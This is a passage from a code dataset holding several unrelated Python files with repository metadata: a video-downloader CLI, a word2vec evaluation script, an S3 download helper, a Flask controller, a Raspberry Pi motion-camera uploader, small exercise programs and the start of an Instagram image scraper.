help='Do not merge video parts'\n )\n download_grp.add_argument(\n '--no-caption', action='store_true',\n help='Do not download captions (subtitles, lyrics, danmaku, ...)'\n )\n download_grp.add_argument(\n '-f', '--force', action='store_true', default=False,\n help='Force overwriting existing files'\n )\n download_grp.add_argument(\n '-F', '--format', metavar='STREAM_ID',\n help='Set video format to STREAM_ID'\n )\n download_grp.add_argument(\n '-O', '--output-filename', metavar='FILE', help='Set output filename'\n )\n download_grp.add_argument(\n '-o', '--output-dir', metavar='DIR', default='.',\n help='Set output directory'\n )\n download_grp.add_argument(\n '-p', '--player', metavar='PLAYER',\n help='Stream extracted URL to a PLAYER'\n )\n download_grp.add_argument(\n '-c', '--cookies', metavar='COOKIES_FILE',\n help='Load cookies.txt or cookies.sqlite'\n )\n download_grp.add_argument(\n '-t', '--timeout', metavar='SECONDS', type=int, default=600,\n help='Set socket timeout'\n )\n download_grp.add_argument(\n '-d', '--debug', action='store_true',\n help='Show traceback and other debug info'\n )\n download_grp.add_argument(\n '-I', '--input-file', metavar='FILE', type=argparse.FileType('r'),\n help='Read non-playlist URLs from FILE'\n )\n download_grp.add_argument(\n '-P', '--password', help='Set video visit password to PASSWORD'\n )\n download_grp.add_argument(\n '-l', '--playlist', action='store_true',\n help='Prefer to download a playlist'\n )\n download_grp.add_argument(\n '-T', '--thread', type=int, default=0,\n help=(\n 'Use multithreading to download (only works for multiple-parts '\n 'video)'\n )\n )\n\n proxy_grp = parser.add_argument_group('Proxy options')\n proxy_grp = proxy_grp.add_mutually_exclusive_group()\n proxy_grp.add_argument(\n '-x', '--http-proxy', metavar='HOST:PORT',\n help='Use an HTTP proxy for downloading'\n )\n proxy_grp.add_argument(\n '-y', 
'--extractor-proxy', metavar='HOST:PORT',\n help='Use an HTTP proxy for extracting only'\n )\n proxy_grp.add_argument(\n '--no-proxy', action='store_true', help='Never use a proxy'\n )\n proxy_grp.add_argument(\n '-s', '--socks-proxy', metavar='HOST:PORT',\n help='Use an SOCKS5 proxy for downloading'\n )\n\n download_grp.add_argument('--stream', help=argparse.SUPPRESS)\n download_grp.add_argument('--itag', help=argparse.SUPPRESS)\n\n parser.add_argument('URL', nargs='*', help=argparse.SUPPRESS)\n\n args = parser.parse_args()\n\n if args.help:\n print_version()\n parser.print_help()\n sys.exit()\n if args.version:\n print_version()\n sys.exit()\n\n if args.debug:\n # Set level of root logger to DEBUG\n logging.getLogger().setLevel(logging.DEBUG)\n\n global force\n global dry_run\n global json_output\n global player\n global extractor_proxy\n global output_filename\n\n output_filename = args.output_filename\n extractor_proxy = args.extractor_proxy\n\n info_only = args.info\n if args.url:\n dry_run = True\n if args.json:\n json_output = True\n # to fix extractors not use VideoExtractor\n dry_run = True\n info_only = False\n\n if args.cookies:\n load_cookies(args.cookies)\n\n caption = True\n stream_id = args.format or args.stream or args.itag\n if args.no_caption:\n caption = False\n if args.player:\n player = args.player\n caption = False\n\n if args.no_proxy:\n unset_proxy()\n else:\n if args.http_proxy:\n set_proxy(parse_host(args.http_proxy))\n if args.socks_proxy:\n set_socks_proxy(args.socks_proxy)\n\n URLs = []\n if args.input_file:\n logging.debug('you are trying to load urls from %s', args.input_file)\n if args.playlist:\n log.e(\n \"reading playlist from a file is unsupported \"\n \"and won't make your life easier\"\n )\n sys.exit(2)\n URLs.extend(args.input_file.read().splitlines())\n args.input_file.close()\n URLs.extend(args.URL)\n\n if not URLs:\n parser.print_help()\n sys.exit()\n\n socket.setdefaulttimeout(args.timeout)\n\n try:\n extra = {}\n if extractor_proxy:\n extra['extractor_proxy'] = extractor_proxy\n if stream_id:\n extra['stream_id'] = stream_id\n download_main(\n download, download_playlist,\n URLs, args.playlist,\n output_dir=args.output_dir, merge=not args.no_merge,\n info_only=info_only, json_output=json_output, caption=caption,\n password=args.password, thread=args.thread,\n **extra\n )\n except KeyboardInterrupt:\n if args.debug:\n raise\n else:\n sys.exit(1)\n except UnicodeEncodeError:\n if args.debug:\n raise\n log.e(\n '[error] oops, the current environment does not seem to support '\n 'Unicode.'\n )\n log.e('please set it to a UTF-8-aware locale first,')\n log.e(\n 'so as to save the video (with some Unicode characters) correctly.'\n )\n log.e('you can do it like this:')\n log.e(' (Windows) % chcp 65001 ')\n log.e(' (Linux) $ LC_CTYPE=en_US.UTF-8')\n sys.exit(1)\n except Exception:\n if not args.debug:\n log.e('[error] oops, something went wrong.')\n log.e(\n 'don\\'t panic, c\\'est la vie. 
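The proxy flags above sit in a mutually exclusive group, so passing, say, both -x and --no-proxy is rejected by argparse itself instead of by hand-rolled checks. The pattern in isolation:

import argparse

parser = argparse.ArgumentParser(prog='demo')
group = parser.add_mutually_exclusive_group()
group.add_argument('-x', '--http-proxy', metavar='HOST:PORT')
group.add_argument('--no-proxy', action='store_true')

parser.parse_args(['-x', '127.0.0.1:8888'])   # fine
parser.parse_args(['--no-proxy'])             # fine
# parser.parse_args(['-x', 'h:1', '--no-proxy'])  # SystemExit: not allowed together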
please try the following steps:'\n )\n log.e(' (1) Rule out any network problem.')\n log.e(' (2) Make sure lulu is up-to-date.')\n log.e(' (3) Check if the issue is already known, on')\n log.e(' https://github.com/iawia002/Lulu/issues')\n log.e(' (4) Run the command with \\'--debug\\' option,')\n log.e(' and report this issue with the full output.')\n else:\n print_version()\n log.i(args)\n raise\n sys.exit(1)\n\n\ndef google_search(url):\n keywords = match1(url, r'https?://(.*)')\n url = 'https://www.google.com/search?tbm=vid&q=%s' % parse.quote(keywords)\n page = get_content(url)\n videos = re.findall(\n r'([^<]+)<', page\n )\n vdurs = re.findall(r'([^<]+)<', page)\n durs = [match1(unescape(dur), r'(\\d+:\\d+)') for dur in vdurs]\n print('Google Videos search:')\n for v in zip(videos, durs):\n print('- video: {} [{}]'.format(\n unescape(v[0][1]),\n v[1] if v[1] else '?'\n ))\n print('# lulu %s' % log.sprint(v[0][0], log.UNDERLINE))\n print()\n print('Best matched result:')\n return(videos[0][0])\n\n\ndef url_to_module(url):\n try:\n video_host = match1(url, r'https?://([^/]+)/')\n video_url = match1(url, r'https?://[^/]+(.*)')\n assert video_host and video_url\n except AssertionError:\n url = google_search(url)\n video_host = match1(url, r'https?://([^/]+)/')\n video_url = match1(url, r'https?://[^/]+(.*)')\n\n if video_host.endswith('.com.cn') or video_host.endswith('.ac.cn'):\n video_host = video_host[:-3]\n domain = match1(video_host, r'(\\.[^.]+\\.[^.]+)$') or video_host\n assert domain, 'unsupported url: ' + url\n\n k = match1(domain, r'([^.]+)')\n if k in SITES:\n return (\n import_module('.'.join(['lulu', 'extractors', SITES[k]])),\n url\n )\n else:\n import http.client\n video_host = match1(url, r'https?://([^/]+)/') # .cn could be removed\n if url.startswith('https://'):\n conn = http.client.HTTPSConnection(video_host)\n else:\n conn = http.client.HTTPConnection(video_host)\n conn.request('HEAD', video_url, headers=FAKE_HEADERS)\n res = conn.getresponse()\n location = res.getheader('location')\n if location and location != url and not location.startswith('/'):\n return url_to_module(location)\n else:\n return import_module('lulu.extractors.universal'), url\n\n\ndef any_download(url, **kwargs):\n m, url = url_to_module(url)\n m.download(url, **kwargs)\n\n\ndef any_download_playlist(url, **kwargs):\n m, url = url_to_module(url)\n m.download_playlist(url, **kwargs)\n\n\ndef main(**kwargs):\n script_main(any_download, any_download_playlist, **kwargs)\n","repo_name":"iawia002/Lulu","sub_path":"lulu/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":39687,"program_lang":"python","lang":"en","doc_type":"code","stars":812,"dataset":"github-code","pt":"35"} +{"seq_id":"19002903204","text":"import gensim\nimport random\nimport logging\n\n# configuration\ntrains = \"../../temp_results/word2vec_hindi.txt\"\ncreate = 1\ntopn = 10\n\ndata_folder = '../data/word2vec_evaluation/'\nTARGET_SYN = data_folder+'syntactic.questions.txt'\nTARGET_SEM_OP = data_folder+'semantic_op.questions.txt'\nTARGET_SEM_BM = data_folder+'semantic_bm.questions.txt'\nTARGET_SEM_DF = data_folder+'semantic_df.questions.txt'\nSRC_NOUNS = data_folder+'nouns.txt'\nSRC_BESTMATCH = data_folder+'bestmatch.txt'\nSRC_DOESNTFIT = data_folder+'doesntfit.txt'\nSRC_OPPOSITE = data_folder+'opposite.txt'\nPATTERN_SYN = [('nouns', 'SI/PL', SRC_NOUNS, 0, 1)]\n#logger.write(filename=train.strip() + '.result', format='%(asctime)s : %(message)s', level=logging.INFO)\nprint (\"TEST\")\n# function 
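url_to_module above keys extractors off the second-level domain: it strips a trailing .com.cn or .ac.cn, keeps the last two dotted labels, then matches the first label against SITES. A hypothetical condensation of that extraction:

import re

def site_key(url):
    host = re.search(r'https?://([^/]+)/', url).group(1)
    if host.endswith('.com.cn') or host.endswith('.ac.cn'):
        host = host[:-3]                      # drop the trailing '.cn'
    m = re.search(r'(\.[^.]+\.[^.]+)$', host)
    domain = m.group(1) if m else host
    return re.search(r'([^.]+)', domain).group(1)

assert site_key('https://www.bilibili.com/video/x') == 'bilibili'
assert site_key('https://v.qq.com.cn/x') == 'qq'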
create_syntactic_testset\n# ... creates syntactic test set and writes it into a file\n# @return void\ndef create_syntactic_testset():\n print (\"TEST\")\n with open(TARGET_SYN, 'w') as t:\n for label, short, src, index1, index2 in PATTERN_SYN:\n t.write(': ' + label + ': ' + short + '\\n')\n for q in create_questions(src, index1, index2):\n t.write(q + '\\n')\n\n\n# function create_semantic_testset\n# ... creates semantic test set and writes it into a file\n# @return void\ndef create_semantic_testset():\n # opposite\n print (\"TEST\")\n with open(TARGET_SEM_OP, 'w') as t:\n for q in create_questions(SRC_OPPOSITE):\n t.write(q + '\\n')\n logging.info('created opposite questions')\n # best match\n with open(TARGET_SEM_BM, 'w') as t:\n groups = open(SRC_BESTMATCH).read().split(':')\n groups.pop(0) # remove first empty group\n for group in groups:\n questions = group.splitlines()\n questions.pop(0)\n while questions:\n for i in range(1,len(questions)):\n question = questions[0].split('-') + questions[i].split('-')\n t.write(' '.join(question) + '\\n')\n questions.pop(0)\n # doesn't fit\n with open(TARGET_SEM_DF, 'w') as t:\n for line in open(SRC_DOESNTFIT):\n words = line.split()\n for wrongword in words[-1].split('-'):\n question = ' '.join(words[:3] + [wrongword])\n t.write(question + '\\n')\n\n\n# function create_questions\n# ... creates single questions from given source\n# @param string src source file to load words from\n# @param integer index2 index of first word in a line to focus on\n# @param integer index2 index of second word in a line to focus on\n# @param integer combinate number of combinations with random other lines\n# @return list of question words\ndef create_questions(src, index1=0, index2=1):\n # get source content\n \n with open(src) as f:\n content = f.readlines()\n content = [x.strip() for x in content]\n \n questions = []\n\n for line in content:\n for i in range(0, 10):\n # get current word pair\n question = list(line.split('-'))\n # get random word pair that is not the current\n random_line = random.choice(list(set(content) - {line}))\n random_word = list(random_line.split('-'))\n # merge both word pairs to one question\n question.extend(random_word)\n questions.append(' '.join(question))\n print (len(questions))\n return questions\n\n\n# function test_mostsimilar\n# ... 
tests given model to most similar word\n# @param word2vec model to test\n# @param string src source file to load words from\n# @param string label to print current test case\n# @param integer topn number of top matches\ndef test_mostsimilar(model, src, label='most similar', topn=5):\n \n num_lines = sum(1 for line in open(src))\n num_questions = 0\n num_right = 0\n num_topn = 0\n # get questions\n import codecs\n with codecs.open(src,encoding='utf-8') as f:\n questions = f.readlines()\n questions = [x.strip() for x in questions]\n \n # test each question\n for question in questions:\n words = question.split()\n # check if all words exist in vocabulary\n if all(x in model.index2word for x in words):\n num_questions += 1\n bestmatches = model.most_similar(positive=[words[1], words[2]], negative=[words[0]], topn=topn)\n # best match\n if words[3] in bestmatches[0]:\n num_right += 1\n # topn match\n for topmatches in bestmatches[:topn]:\n if words[3] in topmatches:\n num_topn += 1\n break\n # calculate result\n correct_matches = round(num_right/float(num_questions)*100, 1) if num_questions>0 else 0.0\n topn_matches = round(num_topn/float(num_questions)*100, 1) if num_questions>0 else 0.0\n coverage = round(num_questions/float(num_lines)*100, 1) if num_lines>0 else 0.0\n # log result\n print (correct_matches)\n print (topn_matches)\n print (coverage)\n\n# function test_mostsimilar\n# ... tests given model to most similar word\n# @param word2vec model to test\n# @param string src source file to load words from\n# @param integer topn number of top matches\ndef test_mostsimilar_groups(model, src, topn=10):\n num_lines = 0\n num_questions = 0\n num_right = 0\n num_topn = 0\n # test each group\n groups = open(src).read().split('\\n: ')\n for group in groups:\n questions = group.splitlines()\n label = questions.pop(0)\n label = label[2:] if label.startswith(': ') else label # handle first group\n num_group_lines = len(questions)\n num_group_questions = 0\n num_group_right = 0\n num_group_topn = 0\n # test each question of current group\n for question in questions:\n words = question.decode('utf-8').split()\n # check if all words exist in vocabulary\n if all(x in model.index2word for x in words):\n num_group_questions += 1\n bestmatches = model.most_similar(positive=[words[1], words[2]], negative=[words[0]], topn=topn)\n # best match\n if words[3] in bestmatches[0]:\n num_group_right += 1\n # topn match\n for topmatches in bestmatches[:topn]:\n if words[3] in topmatches:\n num_group_topn += 1\n break\n # calculate result\n correct_group_matches = round(num_group_right/float(num_group_questions)*100, 1) if num_group_questions>0 else 0.0\n topn_group_matches = round(num_group_topn/float(num_group_questions)*100, 1) if num_group_questions>0 else 0.0\n group_coverage = round(num_group_questions/float(num_group_lines)*100, 1) if num_group_lines>0 else 0.0\n # log result\n # total numbers\n num_lines += num_group_lines\n num_questions += num_group_questions\n num_right += num_group_right\n num_topn += num_group_topn\n # calculate result\n correct_matches = round(num_right/float(num_questions)*100, 1) if num_questions>0 else 0.0\n topn_matches = round(num_topn/float(num_questions)*100, 1) if num_questions>0 else 0.0\n coverage = round(num_questions/float(num_lines)*100, 1) if num_lines>0 else 0.0\n\n# function test_doesntfit\n# ... 
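test_mostsimilar above scores A:B :: C:D analogy questions by asking for most_similar(positive=[B, C], negative=[A]) and checking whether D tops the list. The same call in isolation — placeholder English words, and a loaded KeyedVectors model is assumed:

best = model.most_similar(positive=['king', 'woman'], negative=['man'], topn=5)
top_word, top_score = best[0]
print(top_word, round(top_score, 3))   # ideally 'queen' for an English model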
tests given model to most not fitting word\n# @param word2vec model to test\n# @param string src source file to load words from\ndef test_doesntfit(model, src):\n num_lines = sum(1 for line in open(src))\n num_questions = 0\n num_right = 0\n # get questions\n with open(src) as f:\n questions = f.readlines()\n questions = [x.strip() for x in questions]\n # test each question\n for question in questions:\n words = question.decode('utf-8').split()\n # check if all words exist in vocabulary\n if all(x in model.index2word for x in words):\n num_questions += 1\n if model.doesnt_match(words) == words[3]:\n num_right += 1\n # calculate result\n correct_matches = round(num_right/float(num_questions)*100, 1) if num_questions>0 else 0.0\n coverage = round(num_questions/float(num_lines)*100, 1) if num_lines>0 else 0.0\n \nif create == 1:\n create_syntactic_testset()\n create_semantic_testset()\n\n# get trained model\nmodel = gensim.models.KeyedVectors.load_word2vec_format(trains.strip())\nprint (\"word 2 vec read successfully.\")\n# execute evaluation\n\ntest_mostsimilar_groups(model, TARGET_SYN, topn)\ntest_mostsimilar(model, TARGET_SEM_OP, 'opposite', topn)\ntest_mostsimilar(model, TARGET_SEM_BM, 'best match', topn)\ntest_doesntfit(model, TARGET_SEM_DF)","repo_name":"kabrapratik28/DeepNews","sub_path":"word2vec/eval_word2vec.py","file_name":"eval_word2vec.py","file_ext":"py","file_size_in_byte":8683,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"35"} +{"seq_id":"7785546714","text":"import os\nimport io\nfrom boto3.session import Session\nfrom dotenv import load_dotenv\n\nload_dotenv()\n\n\ndef download_from_aws_s3(filename):\n\n file_stream = io.BytesIO()\n session = Session(aws_access_key_id=os.getenv(\n 'AWS_ACCESS_KEY'), aws_secret_access_key=os.getenv('AWS_SECRET_KEY'))\n\n s3 = session.resource('s3')\n bucket = os.getenv('AWS_BUCKET_NAME')\n\n my_bucket = s3.Bucket(bucket)\n my_bucket.download_fileobj(filename, file_stream)\n file_stream.seek(0)\n\n # print(file_stream)\n\n return {\"file_stream\": file_stream, \"filename\": filename}\n","repo_name":"Jurajzovinec/drawing-slicer","sub_path":"python_services/aws_s3_services/aws_s3_download_file.py","file_name":"aws_s3_download_file.py","file_ext":"py","file_size_in_byte":576,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"36183954723","text":"import datetime\r\nimport json\r\nfrom utils.jwt import Jwt\r\nfrom models.activity import Activity\r\nfrom utils.dumps import response\r\nclass Controller:\r\n def __init__(self):\r\n self.activity = Activity()\r\n def create(self, request):\r\n p = Jwt.authHeader(request)\r\n res = json.loads(p)\r\n if res['code'] == 20000:\r\n data = json.loads(request.get_data())\r\n data['creator'] = res['data']['username']\r\n result = self.activity.save(data)\r\n if result == None:\r\n return response({}, code=50000, message='该广告已存在!')\r\n return response({}, code=20000, message='创建成功!')\r\n else:\r\n return p\r\n def getList(self, request):\r\n p = Jwt.authHeader(request)\r\n res = json.loads(p)\r\n if res['code'] == 20000:\r\n result = self.activity.findAll()\r\n return response(result, code=20000, message='获取成功!')\r\n else:\r\n return p\r\n return p\r\n\r\n def edit(self, request):\r\n p = Jwt.authHeader(request)\r\n res = json.loads(p)\r\n if res['code'] == 20000:\r\n data = json.loads(request.get_data())\r\n result = self.activity.update_one(data['id'], data)\r\n if result == None:\r\n return 
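download_from_aws_s3 above streams the object into an in-memory BytesIO and seeks back to offset 0 so the caller can read it immediately. A typical consumption pattern — the object key is a placeholder, and AWS credentials are assumed to be set in the environment:

result = download_from_aws_s3('drawing-001.pdf')   # placeholder object key
data = result['file_stream'].read()                # works because of the seek(0)
print(result['filename'], len(data), 'bytes')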
","repo_name":"Jurajzovinec/drawing-slicer","sub_path":"python_services/aws_s3_services/aws_s3_download_file.py","file_name":"aws_s3_download_file.py","file_ext":"py","file_size_in_byte":576,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"36183954723","text":"import json\r\nfrom utils.jwt import Jwt\r\nfrom models.activity import Activity\r\nfrom utils.dumps import response\r\nclass Controller:\r\n    def __init__(self):\r\n        self.activity = Activity()\r\n    def create(self, request):\r\n        p = Jwt.authHeader(request)\r\n        res = json.loads(p)\r\n        if res['code'] == 20000:\r\n            data = json.loads(request.get_data())\r\n            data['creator'] = res['data']['username']\r\n            result = self.activity.save(data)\r\n            if result == None:\r\n                return response({}, code=50000, message='This ad already exists!')\r\n            return response({}, code=20000, message='Created successfully!')\r\n        else:\r\n            return p\r\n    def getList(self, request):\r\n        p = Jwt.authHeader(request)\r\n        res = json.loads(p)\r\n        if res['code'] == 20000:\r\n            result = self.activity.findAll()\r\n            return response(result, code=20000, message='Fetched successfully!')\r\n        else:\r\n            return p\r\n\r\n    def edit(self, request):\r\n        p = Jwt.authHeader(request)\r\n        res = json.loads(p)\r\n        if res['code'] == 20000:\r\n            data = json.loads(request.get_data())\r\n            result = self.activity.update_one(data['id'], data)\r\n            if result == None:\r\n                return response({}, code=50000, message='This ad already exists!')\r\n            return response({}, code=20000, message='Updated successfully!')\r\n        else:\r\n            return p\r\n    def delete(self,request):\r\n        p = Jwt.authHeader(request)\r\n        res = json.loads(p)\r\n        if res['code'] == 20000:\r\n            data = json.loads(request.get_data())\r\n            result = self.activity.delete(data)\r\n            return response({}, code=20000, message='Deleted successfully!')\r\n        else:\r\n            return p\r\n\r\n","repo_name":"hfyy456/flask-admin-service","sub_path":"controller/activityController.py","file_name":"activityController.py","file_ext":"py","file_size_in_byte":1877,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"35"} +{"seq_id":"806831300","text":"from sensor_implementation.video_sensor import VideoSensor\nimport numpy as np\nimport time\nimport os\nfrom subprocess import call\nfrom picamera import PiCameraCircularIO\nfrom sensehub_client.client import Client\nfrom sensehub_client.value import Value\nfrom multiprocessing import Process, Queue\nimport base64\nimport configparser\n\n\nclass PrintListener():\n\n    # circular buffer time\n    _CIRCULAR_BUFFER_TIME_S = 5\n    # recording time after no motion is detected\n    _RECORDING_TIME_S = 5\n\n    # output format\n    _FORMAT = \"h264\"\n    # file extension for video saving\n    _FILE_EXTENSION = \"h264\"\n\n    _MOTION_COUNTER_THRESHOLD = 3\n\n    # time before the motion sensing is activated, allows the camera to have a\n    # \"stable\" motion matrix\n    _STABILIZATION_TIME_S = 2\n\n    # time between each upload\n    _UPLOAD_TIME_S = 3\n\n    def __init__(self):\n        self._folderPath = './generated'\n        self._is_camera_recording = False\n        self._last_time_motion = 0\n        self._stream = None\n        self._file = None\n        self._nbImages = 0\n        self._motion_counter = 0\n        client_video, client_image = create_clients('./config.ini')\n        clients = {'image': client_image, 'video': client_video}\n        self._upload_processes, self._message_queues = self._create_processes(\n            clients)\n\n        self._filename_video = ''\n\n        self._last_uploaded = 0\n\n        for process in self._upload_processes.values():\n            print(\"starting process\" + str(process))\n            process.start()\n\n        if not os.path.isdir(self._folderPath):\n            os.mkdir(self._folderPath)\n\n    def new_image(self, a, camera):\n        if self._stream is None:\n            self._stream = PiCameraCircularIO(\n                camera, seconds=PrintListener._CIRCULAR_BUFFER_TIME_S, splitter_port=3)\n            camera.start_recording(\n                self._stream, splitter_port=3, format=PrintListener._FORMAT, sei=True, sps_timing=True)\n\n        # waiting 2 seconds before trying to find motion so the camera has a\n        # stable motion state\n        if self._nbImages < PrintListener._STABILIZATION_TIME_S * camera.framerate:\n            self._nbImages += 1\n            return\n\n        now = time.time()\n\n        a = np.sqrt(\n            np.square(a['x'].astype(float)) +\n            np.square(a['y'].astype(float))\n        ).clip(0, 255).astype(np.uint8)\n\n        is_persistent = False\n\n        # If there're more than 10 vectors with a magnitude greater\n        # than 60, then say we've detected motion\n        if (a > 60).sum() > 10:\n            print('Motion detected!')\n            self._last_time_motion = now\n            self._motion_counter += 1\n        elif now - self._last_time_motion > PrintListener._RECORDING_TIME_S:\n            self._motion_counter = 0\n\n        # Get image every _UPLOAD_TIME_S and convert to base 64\n        if now - self._last_uploaded >= PrintListener._UPLOAD_TIME_S:\n            filename_picture = self._folderPath +'/temp_image_' + str(now)\n            camera.capture(filename_picture, 'jpeg',\n                           use_video_port=True, quality=80)\n            self._message_queues['image'].put(\n                (filename_picture, is_persistent, 'image'))\n            
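# reset the upload throttle so at most one snapshot is queued per _UPLOAD_TIME_S seconds\n            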
self._last_uploaded = now\n\n if now - self._last_time_motion <= PrintListener._RECORDING_TIME_S and self._motion_counter >= PrintListener._MOTION_COUNTER_THRESHOLD:\n if not self._is_camera_recording:\n self._filename_video = self._folderPath + \\\n '/frame%03d.%s' % (now, PrintListener._FILE_EXTENSION)\n self._file = open(self._filename_video, 'wb')\n\n self._stream.copy_to(self._file)\n self._stream.clear()\n\n self._is_camera_recording = True\n camera.start_recording(\n self._file, splitter_port=2, format=PrintListener._FORMAT, sei=True, sps_timing=True)\n\n print('Writing %s' % self._filename_video)\n\n elif self._is_camera_recording:\n camera.stop_recording(splitter_port=2)\n self._file.close()\n self._is_camera_recording = False\n print('Recording stopped!')\n self._message_queues['video'].put(\n (self._filename_video, None, 'video'))\n\n def _create_processes(self, clients):\n processes = {}\n queues = {}\n for data_type, client in clients.items():\n queues[data_type] = Queue()\n processes[data_type] = Process(\n target=self._upload_method, args=(queues[data_type], client))\n return processes, queues\n\n def _convert_mp4(self, filename):\n filename_mp4 = filename +\"_converted.mp4\"\n command = \"MP4Box -add %s %s\" %(filename, filename_mp4)\n returncode = call(command.split(\" \"))\n if returncode != 0:\n return filename\n else:\n os.remove(filename)\n return filename_mp4\n\n def _upload_method(self, queue, client):\n while True:\n filename, is_persistent, data_type = queue.get()\n\n try:\n if data_type == 'video':\n filename = self._convert_mp4(filename)\n\n value = Value(value=self._toBase64(filename),\n type=data_type,\n meta={'persist': is_persistent})\n status, message = client.new_value(value)\n if status:\n print('Successfully uploaded : ' + data_type)\n os.remove(filename)\n else:\n print(\"Could not connect to server\")\n finally:\n pass\n\n def _toBase64(self, filename):\n '''\n Convert image to base64\n :param filename: filename\n :return:\n '''\n with open(filename, 'rb') as img:\n return base64.b64encode(img.read()).decode('utf-8')\n\n\ndef create_clients(filename):\n '''\n i.e : create_client('./config.ini')\n '''\n\n try:\n config = configparser.ConfigParser()\n config.read(filename)\n\n server_ip = config.get(\"server\", 'ip')\n server_port = config.get(\"server\", 'port')\n\n sensor_id_video = config.get(\"sensor_video\", 'sensor_id')\n key_video = config.get(\"sensor_video\", 'key')\n\n sensor_id_image = config.get(\"sensor_picture\", 'sensor_id')\n key_image = config.get(\"sensor_picture\", 'key')\n\n return Client(server_ip, server_port, sensor_id_video, key_video), Client(server_ip, server_port, sensor_id_image, key_image)\n\n except FileExistsError:\n print(\"Error with file\")\n except FileNotFoundError:\n print(\"File does not exist\")\n except configparser.NoOptionError:\n print(\"Option does not exist\")\n\n\ndef main():\n sensor = VideoSensor('videoTest')\n sensor.add(PrintListener())\n input(\"ENTER TO QUIT\\n\")\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"MichaelCaraccio/pi-eye","sub_path":"use/main_camera_sensor.py","file_name":"main_camera_sensor.py","file_ext":"py","file_size_in_byte":6960,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"6566947039","text":"import copy\nfrom math import sqrt\nimport sys\nfrom collections import defaultdict, deque\nfrom itertools import permutations, combinations\nimport heapq\nimport bisect\n\ndr, dc = [-1, 1, 0, 0], [0, 0, -1, 1]\n\ninput = 
sys.stdin.readline\nINF = sys.maxsize\n\n# ===========================================================\n\nn = int(input())\n\nword = [input().rstrip() for _ in range(n)]\n\ndict = {}\n\nfor i in range(n):\n for j in range(len(word[i])):\n if word[i][j] in dict:\n dict[word[i][j]] += 10 ** (len(word[i]) - j - 1)\n else:\n dict[word[i][j]] = 10 ** (len(word[i]) - j - 1)\n\nnums = []\n\nfor v in dict.values():\n nums.append(v)\n\nnums.sort(reverse=True)\n\nans = 0\npows = 9\nfor i in nums:\n ans += pows * i\n pows -= 1\nprint(ans)\n","repo_name":"chojs23/problemSolving","sub_path":"boj/그리디/1339.py","file_name":"1339.py","file_ext":"py","file_size_in_byte":764,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"35"} +{"seq_id":"40778399411","text":"import re\nimport json\nfile = open(\"8989.txt\", 'r', encoding=\"utf8\")\n\nrow = file.readlines()\n\nquestions = []\n\nquestion = \"\"\noptions = []\n\n# re.match(r'^\\d+\\.', line):\n\nprev_line = \"\"\n\nfor line in row:\n if re.match(r'^\\d+\\. ', line):\n question = line\n elif re.match(r'^.\\) ', line):\n otvet = line[3:]\n options.append(otvet)\n\n if re.match(r'^Г\\) ', line):\n questions.append(\n {\n \"question\": question,\n \"options\": options,\n \"correct\": 0\n }\n )\n question = \"\"\n options = []\n\n#print(json.dumps(questions, indent=4))\n#print(questions)\n\nwith open('8989.json', 'w') as outfile:\n json.dump(questions, outfile)\n","repo_name":"vladsadretdinov/medichkinet","sub_path":"__source/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":728,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"38079078557","text":"#-----17 program to convert height (in feet and inches) to centimetres-----\ndef main():\n while True:\n try:\n print('Enter the height in the following format ft,inches')\n height = input('Enter height : ')\n h = height.split(',')\n centi = float(h[0]) * 30.48 + float(h[1]) * 2.54\n print('The given height in centimeters is' , centi , 'cm')\n break\n except:\n print('Invalid entry, follow the format')\nmain()\n","repo_name":"laibanasir/python-assignments","sub_path":"17 ft inches to cm.py","file_name":"17 ft inches to cm.py","file_ext":"py","file_size_in_byte":496,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"35"} +{"seq_id":"5864192731","text":"import sys\n\nsys.path.append('..')\nfrom Scraper.common.util import save_json, read_json\nfrom Scraper.common.base_classes import Scraper, STATUS_UNFINISHED, STATUS_FINISHED\nimport pandas as pd\nimport os\nimport logging\nimport time\nimport requests\nfrom tqdm import tqdm\n\n\ndef get_image(url):\n try:\n r = requests.get(url)\n r.raise_for_status() # raises an HTTPError if an error has occurred during the request (e.g. 
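a 4xx/5xx status such as 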
404)\n return r.content\n except requests.exceptions.HTTPError as err:\n print(err)\n # logger.error(err)\n # logger.error(r.content.decode('utf-8'))\n\n\ndef create_log_msg(post_id, msg):\n return \"{} - {}\".format(post_id, msg)\n\n\nclass InstagramImageScraper(Scraper):\n \"\"\"\n Scrapes images from Instagram given the image urls\n \"\"\"\n\n def __init__(self, scrape_folder, posts, sleep_time, max_attempts=10, skip_if_exists=True):\n \"\"\"\n The scrape will go over each post in 'posts' and attempt to scrape it.\n After it has reached the bottom of the posts list, it will re-do the scrape for all failed posts.\n This process is repeated until each post is either successfully scraped or has 'max_attempts' failed attempts.\n :param scrape_folder: folder where results and scrape data will be stored to.\n :param posts: Iterable that contains 3 lists: post ids, post shortcodes, image urls\n :param sleep_time: time to wait between scrapes in seconds.\n :param max_attempts: scraper will stop trying to scrape a post if it has failed at least max_attempts times.\n :param skip_if_exists: skip images that already exist in the output folder\n \"\"\"\n super().__init__(scrape_folder)\n self.skip_if_exists = skip_if_exists\n\n post_ids, shortcodes, image_urls = posts\n\n assert len(post_ids) == len(set(post_ids)), \"Please remove duplicate posts\"\n\n self.image_folder = os.path.join(self.scrape_folder, \"images\")\n os.makedirs(self.image_folder, exist_ok=True)\n\n # Load scrape config if there is an existing one, else create new one\n self.config_file = os.path.join(self.scrape_folder, \"scraping_config.csv\")\n if os.path.exists(self.config_file):\n print(\"Resuming scrape from existing config...\")\n self._read_config()\n else:\n print(\"Initializing new scrape...\")\n self.config = pd.DataFrame(data={\n \"post_id\": post_ids,\n \"image_scraped\": [0] * len(post_ids), # 0=no, 1=yes\n \"image_attempts\": [0] * len(post_ids), # number of attempted scrapes\n \"max_attempts\": [max_attempts] * len(post_ids),\n \"shortcode\": shortcodes,\n \"image_url\": image_urls\n 